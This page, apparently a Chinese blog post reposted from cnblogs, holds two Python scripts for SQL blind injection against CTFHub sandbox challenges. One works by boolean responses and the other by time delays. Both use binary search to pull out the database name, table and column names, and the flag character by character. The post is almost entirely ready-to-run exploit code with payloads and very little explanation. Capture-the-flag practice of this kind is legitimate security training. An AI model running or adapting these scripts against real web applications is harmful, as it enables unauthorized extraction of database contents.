zoukankan      html  css  js  c++  java
  • sql布尔盲注和时间盲注的二分脚本

    布尔盲注:

    import requests
    
    url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)
    			params = {'id':payload}
    			r = requests.get(url,params = params)
    			if "query_success" in r.text:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    

    时间盲注:

    import requests
    import time
    
    #   time.time()
    
    url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"
    
    def inject_database(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_table(url):
    	name = ''
    
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def inject_column(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    def flag(url):
    	name = ''
    	for i in range(1,100000):
    		low = 32
    		high = 128
    		mid = (low + high) // 2
    		while low < high:
    			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)
    			params = {'id':payload}
    			start_time = time.time()	#	注入前的系统时间
    			r = requests.get(url,params = params)
    			end_time = time.time()		# 	注入后的时间
    			if end_time - start_time > 1:
    				low = mid + 1
    			else:
    				high = mid
    			mid = (low + high) // 2
    
    		if mid == 32:
    			break
    		name = name + chr(mid)	
    		print (name)
    
    # inject_database(url)
    # inject_table(url)
    # inject_column(url)
    flag(url)
    
  • 相关阅读:
    svn常用命令
    mysql5.6 sql_mode设置
    centos6.5 mysql5.6主从复制
    linux 挂载windows共享文件夹
    hadoop+hive+hbase+zookeeper安装
    Linux踢出登陆用户的正确姿势
    个人博客项目部署到腾讯云记录(私人记录)
    Python中的单例模式的几种实现方式和优化以及pyc文件解释(转)
    关于window.location.hash的理解及其应用(转)
    Django model反向关联名称的方法(转)
  • 原文地址:https://www.cnblogs.com/lemon629/p/13870659.html
Copyright © 2011-2022 走看看